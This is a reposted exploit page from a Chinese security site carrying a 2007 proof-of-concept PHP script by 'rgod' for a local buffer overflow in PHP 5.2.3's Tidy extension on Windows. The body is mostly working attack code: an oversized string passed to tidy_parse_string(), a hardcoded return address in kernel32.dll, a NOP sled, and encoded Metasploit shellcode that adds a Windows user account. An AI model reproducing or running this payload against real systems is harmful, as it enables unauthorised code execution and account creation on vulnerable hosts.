PHP 5.2.3 Tidy extension Local Buffer Overflow Exploit
|
来源:retrogod.altervista.org 作者:rgod 发布时间:2007-06-21
|
|
<?php //PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local //buffer overflow poc (win) //rgod //site: retrogod.altervista.org
//quickly tested on xp sp2, worked both from the cli and on apache //let's have a look here: http://www.google.com/codesearch?hl=it&q=+tidy_parse_string&sa=N
if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}
# win32_adduser - PASS=tzu EXITFUNC=thread USER=sun Size=233 Encoder=JmpCallAdditive http://metasploit.com $scode = "\xfc\xbb\x0b\xad\x7d\x9a\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85". "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xf7\x45\x39\x9a\x07\x96\x49". "\xdf\x3b\x1d\x31\xe5\x3b\x20\x25\x6e\xf4\x3a\x32\x2e\x2a\x3a\xaf". "\x98\xa1\x08\xa4\x1a\x5b\x41\x7a\x85\x0f\x26\xba\xc2\x48\xe6\xf1". "\x26\x57\x2a\xee\xcd\x6c\xfe\xd5\x29\xe7\x1b\x9e\x6d\x23\xe5\x4a". "\xf7\xa0\xe9\xc7\x73\xe9\xed\xd6\x68\x9e\x12\x52\x6f\x4b\xa3\x38". "\x54\x8f\x77\xf1\x54\xeb\xfc\xb2\x64\x76\xc2\x4b\x89\xf3\x83\xa7". "\x1a\x73\x18\x15\x97\x1b\x28\x8e\xa1\x50\xa8\xe0\xb2\x66\xa9\x8b". "\xdb\x5a\xf6\xba\xed\xc2\x5e\x34\xe9\x81\x9f\x3d\x5a\xed\xf0\x0c". "\xba\x8d\x66\x09\xc5\xc7\x79\x7e\xc5\x30\xe6\xed\x5d\x90\x8c\x95". "\xf8\xcc\x61\x05\x23\x62\x1b\xbd\x03\x0f\x90\x58\x36\xcf\x25\xd6". "\xd8\x2f\xbe\x62\x50\x0f\x11\xd2\xde\x0b\x4d\xf2\xf8\xb3\xe3\x9f". "\x70\x93\x97\x30\x1a\xb2\x0b\xa8\xae\x5b\xa1\x46\x6f\xe2\x2d\xca". "\x06\x8a\xc4\x67\xad\x20\x76\xfc\x22\xb6\x0b\xdc\xcf\x43\x82\x3c". "\x1f\xea\x1e\x79\x5f\xec\x9e\x81\x5f";
$EIP="\x8B\x51\x81\x7C"; //0x7C81518B call esp kernel32.dll $NOP=str_repeat("\x90",12); $____buff=str_repeat("a",2036).$EIP.$NOP.$scode; tidy_parse_string(1,$____buff,1); ?>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|